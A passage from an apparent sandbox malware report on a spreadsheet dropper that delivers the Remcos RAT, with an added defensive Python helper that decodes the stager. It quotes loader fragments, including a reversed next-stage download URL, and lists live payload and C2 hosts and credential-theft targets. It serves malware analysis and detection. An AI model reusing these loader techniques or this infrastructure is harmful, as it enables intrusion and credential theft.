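so the stager does not actually guard against missing markers; and the base64 inside the mshta -> cmd -> powershell rows has been lower-cased as rendered here (the `icagicag` runs are lower-cased `ICAgICAg`, base64 for a run of spaces), so that inner payload cannot be decoded from the page as printed. `$Codigo` and `desativado` are Portuguese for "code" and "disabled".

The following triage helper is an added example, not part of the Joe Sandbox report or of the sample; it is written in Python rather than PowerShell so it can run on an analyst workstation without evaluating anything from the sample. It takes the `$Codigo` filler as printed on this page (an assumption, since the original filler characters did not survive extraction), recovers the next-stage URL and host-process name from the `VAI` argument list, carves a marker-delimited payload from a constructed stand-in for `vbs.jpg` (the real downloaded bytes are not on this page) while enforcing the bounds check the stager discards, and folds `[char]N` concatenations into the text the inner `iex` would receive, using a constructed base64 literal `QUJD` in place of the page's lower-cased one.

```python
import base64
import re

# --- Constructed inputs ---------------------------------------------------
# The report renders each filler run of the $Codigo string as "? ? ? ? ?";
# the real characters did not survive extraction, so that printed run is
# taken as the filler here (assumption). The prefix is copied from the
# wscript.exe -> powershell.exe row and cut at a 6-character boundary so
# that it decodes to whole UTF-16 code units.
FILLER_AS_PRINTED = "? ? ? ? ?"
CODIGO_PREFIX = (
    "J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw"
    "? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ"
    "? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh"
    "? ? ? ? ?Dg? ? ? ? ?"
)

# Tail of the second powershell.exe row, verbatim from the report.
INVOKE_LINE = (
    "$method = $type.GetMethod('VAI').Invoke($null, [object[]] "
    "('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , "
    "'desativado' , 'desativado','RegAsm',''))"
)

# Constructed stand-in for vbs.jpg: JPEG-looking bytes with a base64 blob
# between the stager's markers. The "payload" is fake; only its MZ prefix
# matters for the sanity check below.
START_MARK, END_MARK = b"<<BASE64_START>>", b"<<BASE64_END>>"
FAKE_PAYLOAD = b"MZ" + b"\x90" * 14 + b"constructed stand-in for the .NET loader"
FAKE_IMAGE = (
    b"\xff\xd8\xff\xe0JFIF-looking junk " + START_MARK
    + base64.b64encode(FAKE_PAYLOAD) + END_MARK + b" trailing junk"
)

# Shape of the mshta -> cmd -> powershell row, with a constructed base64
# literal (QUJD, "ABC") in place of the page's lower-cased one.
CHAR_CONCAT_SAMPLE = (
    "'[system.text.encoding]'+[char]58+[char]58+'utf8.getstring("
    "[system.convert]'+[char]0x3a+[char]58+'frombase64string('"
    "+[char]34+'QUJD'+[char]34+'))'"
)


def decode_utf16_base64(obfuscated: str, filler: str) -> str:
    """Undo the 'every A became a filler run' trick and decode the UTF-16LE
    base64 that PowerShell -EncodedCommand style strings use."""
    raw = base64.b64decode(obfuscated.replace(filler, "A"), validate=True)
    # Sandbox reports truncate long command lines; drop a dangling odd byte
    # instead of failing on half a UTF-16 code unit.
    raw = raw[: len(raw) - len(raw) % 2]
    return raw.decode("utf-16-le")


def parse_vai_invoke(cmdline: str) -> dict:
    """Pull the [object[]] argument list apart: the first argument is the
    next-stage URL written backwards, the fifth the host process name."""
    m = re.search(r"\[object\[\]\]\s*\((.*)\)\)", cmdline)
    if not m:
        raise ValueError("no [object[]] argument list in command line")
    args = re.findall(r"'([^']*)'", m.group(1))
    return {
        "next_stage_url": args[0][::-1],
        "host_process": args[4],
        "raw_args": args,
    }


def carve_between_markers(blob: bytes) -> bytes:
    """Mirror the stager's IndexOf/Substring/FromBase64String step, but act
    on the bounds check that the original only evaluates and throws away."""
    start, end = blob.find(START_MARK), blob.find(END_MARK)
    if start < 0 or end <= start:
        raise ValueError("markers missing or out of order")
    inner = blob[start + len(START_MARK):end].strip()
    # .NET's FromBase64String ignores embedded whitespace; b64decode without
    # validate=True does the same.
    return base64.b64decode(inner)


def looks_like_pe(data: bytes) -> bool:
    """Cheap sanity check before handing a carved blob to a .NET decompiler:
    Assembly.Load expects a PE image, which starts with the MZ magic."""
    return data[:2] == b"MZ"


_TOKEN = re.compile(r"'([^']*)'|\[char\](0x[0-9a-fA-F]+|\d+)")


def fold_char_concat(expr: str) -> str:
    """Resolve 'a'+[char]58+[char]0x3a+'b' joins into the literal text the
    inner iex receives; the outer iex then runs the decoded script."""
    parts = []
    for literal, code in _TOKEN.findall(expr):
        parts.append(chr(int(code, 0)) if code else literal)
    return "".join(parts)


if __name__ == "__main__":
    print(decode_utf16_base64(CODIGO_PREFIX, FILLER_AS_PRINTED))
    print(parse_vai_invoke(INVOKE_LINE))
    payload = carve_between_markers(FAKE_IMAGE)
    print(looks_like_pe(payload), len(payload), "bytes")
    print(fold_char_concat(CHAR_CONCAT_SAMPLE))
```

Run directly it prints the recovered values; each function also returns its result so the same logic can sit in a detection pipeline. The MZ check is only a sanity test: a carved payload that passes it still belongs in a .NET decompiler, never in `Assembly.Load`.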
                  Source: RegAsm.exe, 0000000F.00000002.842095725.0000000000631000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.842261724.0000000000683000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00434CB6 cpuid 28_2_00434CB6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,28_2_0045201B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,28_2_004520B6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,28_2_00452143
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,28_2_00452393
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,28_2_00448484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,28_2_004524BC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,28_2_004525C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,28_2_00452690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,28_2_0044896D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,28_2_0040F90C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,28_2_00451D58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,28_2_00451FD0
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_0041A045 __EH_prolog,GdiplusStartup,CreateDirectoryW,Sleep,Sleep,GetLocalTime,Sleep,28_2_0041A045
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_0041B69E GetUserNameW,28_2_0041B69E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,28_2_00449210
                  Source: C:\Windows\System32\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 14.2.powershell.exe.133a4b98.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 14.2.powershell.exe.133a4b98.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000001C.00000002.476275781.0000000000511000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000F.00000002.842095725.0000000000631000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000F.00000002.842095725.0000000000615000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000E.00000002.443270991.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2848, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3024, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4092, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 28_2_0040BA4D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 28_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: \key3.db 28_2_0040BB6B

                  Remote Access Functionality

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-CJ3HJ1
                  Source: Yara match | File source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 14.2.powershell.exe.133a4b98.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 14.2.powershell.exe.133a4b98.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000001C.00000002.476275781.0000000000511000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000F.00000002.842095725.0000000000631000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000F.00000002.842095725.0000000000615000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000E.00000002.443270991.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2848, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3024, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4092, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: cmd.exe 28_2_0040569A
                  MITRE ATT&CK techniques by tactic (a number in front of a technique is kept as it appears in the report):
                  Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
                  Resource Development: 121 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
                  Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
                  Execution: 1 Native API; 23 Exploitation for Client Execution; 221 Command and Scripting Interpreter; 2 Service Execution; 4 PowerShell; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
                  Persistence: 121 Scripting; 1 DLL Side-Loading; 1 Windows Service; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
                  Privilege Escalation: 1 DLL Side-Loading; 1 Bypass User Account Control; 1 Access Token Manipulation; 1 Windows Service; 222 Process Injection; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
                  Defense Evasion: 1 Deobfuscate/Decode Files or Information; 21 Obfuscated Files or Information; 1 Install Root Certificate; 1 DLL Side-Loading; 1 Bypass User Account Control; 1 Masquerading; 21 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 222 Process Injection; Dynamic API Resolution; Stripped Payloads
                  Credential Access: 1 OS Credential Dumping; 111 Input Capture; 2 Credentials In Files; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
                  Discovery: 2 System Time Discovery; 1 Account Discovery; 1 System Service Discovery; 3 File and Directory Discovery; 35 System Information Discovery; 2 Security Software Discovery; 21 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery; 1 Remote System Discovery
                  Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
                  Collection: 11 Archive Collected Data; 1 Email Collection; 111 Input Capture; 4 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
                  Command and Control: 13 Ingress Tool Transfer; 21 Encrypted Channel; 1 Remote Access Software; 2 Non-Application Layer Protocol; 213 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
                  Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
                  Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption
                  Behavior Graph ID: 1500265 | Sample: PO_304234.xls | Startdate: 28/08/2024 | Architecture: WINDOWS | Score: 100
                  Start: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Found malware configuration; 22 other signatures
                    EXCEL.EXE: contacts 192.3.193.155 (ports 49164, 49166, 49167; AS-COLOCROSSINGUS, United States) and zhort.de 88.99.66.38 (ports 443, 49163, 49165; HETZNER-ASDE, Germany); dropped C:\Users\user\Desktop\PO_304234.xls (copy), Composite and C:\Users\user\...\IEnetworkroundthings[1].hta, HTML; Microsoft Office drops suspicious files
                      mshta.exe: contacts zhort.de; Suspicious command line found; PowerShell case anomaly found
                        cmd.exe: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); PowerShell case anomaly found
                          powershell.exe: dropped C:\...\wecreatedbuttersmoothbutterthin.vBS, Unicode and C:\Users\user\AppData\...\imlwlgjg.cmdline, Unicode; Suspicious powershell command line found; Installs new ROOT certificates; Suspicious execution chain found
                            wscript.exe: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Very long command line found; 3 other signatures
                              powershell.exe: Suspicious powershell command line found
                                powershell.exe: contacts ia803104.us.archive.org 207.241.232.154 (ports 443, 49168, 49176; INTERNET-ARCHIVEUS, United States); Writes to foreign memory regions; Injects a PE file into a foreign processes
                                  RegAsm.exe: contacts cloudsave.duckdns.org 192.3.64.135 (ports 14645, 49170; AS-COLOCROSSINGUS, United States; Uses dynamic DNS services) and geoplugin.net 178.237.33.50 (ports 49172, 80; ATOM86-ASATOM86NL, Netherlands); Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Contains functionality to steal Chrome passwords or cookies; 3 other signatures
                            csc.exe: dropped C:\Users\user\AppData\Local\...\imlwlgjg.dll, PE32
                              cvtres.exe
                      mshta.exe: contacts zhort.de
                        cmd.exe
                          powershell.exe
                            wscript.exe
                              powershell.exe
                                powershell.exe
                                  RegAsm.exe
                            csc.exe: dropped C:\Users\user\AppData\Local\...\mjo4tj0d.dll, PE32
                              cvtres.exe

                  Source | Detection | Scanner
                  PO_304234.xls | 11% | ReversingLabs
                  PO_304234.xls | 20% | Virustotal
                  PO_304234.xls | 100% | Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  Source | Detection | Scanner
                  zhort.de | 2% | Virustotal
                  geoplugin.net | 1% | Virustotal
                  cloudsave.duckdns.org | 0% | Virustotal
                  ia803104.us.archive.org | 1% | Virustotal
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  zhort.de | 88.99.66.38 | true | false | | unknown
                  geoplugin.net | 178.237.33.50 | true | false | | unknown
                  cloudsave.duckdns.org | 192.3.64.135 | true | true | | unknown
                  ia803104.us.archive.org | 207.241.232.154 | true | true | | unknown
                  Name | Malicious | Antivirus Detection | Reputation
                  http://192.3.193.155/xampp/boz/wecreatedbuttersmoothbutterthings.tIF | true | 9% Virustotal; Avira URL Cloud: safe | unknown
                  https://zhort.de/pitash | false | 2% Virustotal; Avira URL Cloud: safe | unknown
                  https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg | true | URL Reputation: malware | unknown
                  http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta | true | 10% Virustotal; Avira URL Cloud: safe | unknown
                  http://192.3.193.155/xampp/boz/REDS.txt | true | 9% Virustotal; Avira URL Cloud: safe | unknown
                  http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
                  cloudsave.duckdns.org | true | 0% Virustotal; Avira URL Cloud: safe | unknown
                  Name | Source | Malicious | Antivirus Detection | Reputation
                  http://192.3.193.155powershell.exe, 0000000E.00000002.436681548.00000000027F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.477435438.00000000028B9000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
URL (as found in memory, trailing junk bytes kept) | Source (process, memory dump) | Malicious | Detection | Reputation
https://zhort.de/pitash4 | mshta.exe, 00000004.00000002.407298326.000000000053A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://zhort.de/pitash0 | mshta.exe, 00000004.00000002.407298326.000000000053A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ia803104.us.archive.org | powershell.exe, 0000000E.00000002.436681548.0000000002622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.477435438.00000000026E1000.00000004.00000800.00020000.00000000.sdmp | true | 1%, Virustotal; Avira URL Cloud: safe | unknown
http://ocsp.entrust.net03 | mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2E8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C4BD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htax;EB | mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000007.00000002.429788312.0000000012411000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2E8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://zhort.de/(c5 | mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://zhort.de/pitash8i | mshta.exe, 00000011.00000002.456621218.000000000039E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htaEB | mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://go.micros | powershell.exe, 00000007.00000002.423275187.00000000038EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.423275187.0000000002B21000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ia803104.us.archive.org/27/items/vbs_20240 | powershell.exe, 0000000C.00000002.459682593.0000000002753000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.488464745.0000000002785000.00000004.00000800.00020000.00000000.sdmp | true | 1%, Virustotal; Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp/C | powershell.exe, 0000000E.00000002.443270991.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gpSf | RegAsm.exe, 0000000F.00000002.842261724.000000000066C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htaq;EB | mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000007.00000002.429788312.0000000012411000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000007.00000002.429788312.0000000012411000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://192.3.193.155/=VEB | mshta.exe, 00000004.00000003.406238458.0000000003D8D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D8D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D8D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
